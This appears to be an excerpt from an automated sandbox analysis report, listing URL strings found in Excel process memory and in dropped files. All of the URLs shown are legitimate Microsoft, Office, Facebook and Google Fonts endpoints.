    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.pngx
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsellr-j
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://clients.config.office.net/
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/H
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/iosy
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyures
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspxOneNoteCloudFilesConsumerEmbedhttps://onedrive.live.com/em
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://config.edge.skype.com
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
    Source: EXCEL.EXE, 00000001.00000003.382012892.0000000015A33000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://connect.facebook.net/es_LA/sdk/xfbml.customerchat.js
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://cortana.ai
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://cortana.ai/api
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai/apiI.
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://cortana.aietlF/
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://cr.office.com
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://cr.office.com_/
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comE
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comH
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comK
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comn
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com~
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile~
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesBearer
    Source: EXCEL.EXE, 00000001.00000002.579794121.0000000012E6D000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesvU
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://dev.cortana.ai
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://devnull.onenote.com
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comBearer
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comMBI_SSL_SHORT
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comt
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://directory.services.
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://enrichment.osi.office.net/
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1B5
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1/
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/u
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtmlP3H
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://entitlement.diagnostics.office.com0
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://entity.osi.office.net/t
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech2F
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidUserVoiceOf
    Source: EXCEL.EXE, 00000001.00000002.579029622.0000000012CD0000.00000004.00000001.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidp
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://fonts.googleapis.com/css2?family=Josefin
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://fonts.googleapis.com/css2?family=Roboto:ital
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic
